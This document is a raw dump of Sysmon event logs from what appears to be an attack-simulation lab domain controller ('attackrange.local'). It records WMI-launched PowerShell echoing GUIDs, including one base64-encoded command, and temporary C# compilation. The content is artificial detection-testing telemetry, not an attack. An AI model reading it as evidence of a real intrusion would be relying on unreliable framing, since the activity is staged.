22:55:47.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697651Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.052{05ADC7E1-229F-6039-1600-00000000AD01}15407320C:\Windows\system32\svchost.exe{05ADC7E1-70F3-603D-7B88-00000000AD01}5240C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697650Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.052{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-70F3-603D-7B88-00000000AD01}5240C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697649Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.052{05ADC7E1-70F3-603D-7B88-00000000AD01}52404244C:\Windows\system32\conhost.exe{05ADC7E1-70F3-603D-7A88-00000000AD01}8468C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697648Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.036{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-70F3-603D-7B88-00000000AD01}5240C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001697647Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.036{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-70F3-603D-7A88-00000000AD01}8468C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001697646Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.036{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697645Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.036{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697644Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.036{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697643Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.021{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697642Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.021{05ADC7E1-229D-6039-0500-00000000AD01}636752C:\Windows\system32\csrss.exe{05ADC7E1-70F3-603D-7A88-00000000AD01}8468C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001697641Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.021{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-70F3-603D-7A88-00000000AD01}8468C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000001697640Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.035{05ADC7E1-70F3-603D-7A88-00000000AD01}8468C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -NoProfile -C Write-Host fc447306-6645-4777-bd13-8f6d9f2743bfC:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-70EB-603D-6E88-00000000AD01}6868C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe 10341000x80000000000000001697977Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.990{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-70F4-603D-8588-00000000AD01}6764C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001697976Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.990{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-70F4-603D-8488-00000000AD01}8564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001697975Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.990{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697974Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.990{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697973Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.990{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697972Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.990{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697971Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.990{05ADC7E1-229D-6039-0500-00000000AD01}6361168C:\Windows\system32\csrss.exe{05ADC7E1-70F4-603D-8488-00000000AD01}8564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001697970Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.990{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-70F4-603D-8488-00000000AD01}8564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000001697969Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.992{05ADC7E1-70F4-603D-8488-00000000AD01}8564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -NoProfile -E VwByAGkAdABlAC0ASABvAHMAdAAgAGUAZgA2ADAAZABkADEAOQAtAGUAZABhADIALQA0ADAANQBmAC0AOABkADUAZgAtADUAOAA2ADIAYQAyAGQAYQBlADEAYgA5AA==C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-70EB-603D-6E88-00000000AD01}6868C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe 23542300x80000000000000001697968Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.865{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F5799989E3EDF3E3CBC26EF51BFB6E38,SHA256=B8795153DA9A92A317A47F2CC1B65983104E822FE72DA6FB28170F7926B0196E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697967Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.824{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=36F4DCAD68C748CE4BE208CF3A3604A0,SHA256=842902626D560FD71D5B3A9CA1CE180FBC08F6026D66047D8D1A40D60E22332C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697966Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.786{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=FAFAE09C36C4AC6C4CA5BA5F0262B95D,SHA256=62DE3C525BDFDD9AF3F3E8DCC642AA0C1BB6C3364EDF6805F12528AEC004AD69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697965Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.786{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=FBFD0957B906E5E896B1E7E3E98A613A,SHA256=0DD642E0605F46B3B560DEF0630F3067C01797F431C2B0A7B0AAE1008F776C0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697964Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.771{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=7093681ADB7949083E0D928D74AD8966,SHA256=393D4AA7DAEA351BE96135CB0A303D2C7373A1F00635CE80B47B486C19883EB4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697963Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.755{05ADC7E1-70F4-603D-8188-00000000AD01}3124ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\arfddg5p\arfddg5p.0.csMD5=FB718D19F4C91D265609078FD8B12F5B,SHA256=C8612E37CBE1FB289864974C65AE8679D1AD656EAF43D265D3F277D28679692D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697962Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.755{05ADC7E1-70F4-603D-8188-00000000AD01}3124ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\arfddg5p\arfddg5p.outMD5=2729FEB65355FECE554A5AC190D12F30,SHA256=53036B7E028CF433D9E73D89EA445B68F9A5E400312B1932E339BE7BD9C679BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697961Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.755{05ADC7E1-70F4-603D-8188-00000000AD01}3124ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\arfddg5p\arfddg5p.cmdlineMD5=E5370D26EF5830845799702F49A52884,SHA256=04A3382AA8F7988DC5724AD3AAADC76F64C9A497000A10F329AAD9B5915E7E28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697960Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.740{05ADC7E1-70F4-603D-8188-00000000AD01}3124ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\arfddg5p\arfddg5p.dllMD5=5CF315B30EBF1BB207BB0F43314A0978,SHA256=33927CE7F404F2CF05B9AE9CFB9FE1F2FEB0449B6DF6D964C0B411AABD67FF4B,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x80000000000000001697959Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.740{05ADC7E1-70F4-603D-8288-00000000AD01}5132ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\2\arfddg5p\CSCF60D2C72CB24E5CA37C5EAFB23BE71.TMPMD5=BB72DA98CEB6A0D1D075AB4A782C9665,SHA256=4CF21E7FDFE1E4A90648E1725535C0E81A9F21D00A75544134D7457AD2FEEA8B,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001697958Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.localDLL2021-03-01 22:55:48.740{05ADC7E1-70F4-603D-8288-00000000AD01}5132C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\2\arfddg5p\arfddg5p.dll2021-03-01 22:55:48.646 23542300x80000000000000001697957Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.740{05ADC7E1-70F4-603D-8288-00000000AD01}5132ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\2\arfddg5p\arfddg5p.dllMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697956Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.740{05ADC7E1-70F4-603D-8288-00000000AD01}5132ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\RESB0B.tmpMD5=E9B1AFC892A2669D74CC5FE6D74327EF,SHA256=7B796C8CAD8A1771720F1D69C89212DF944DE2BE42B0AB1D5F5C21B304A0AD4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697955Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.724{05ADC7E1-70F4-603D-8388-00000000AD01}4332ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\RESB0B.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001697954Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 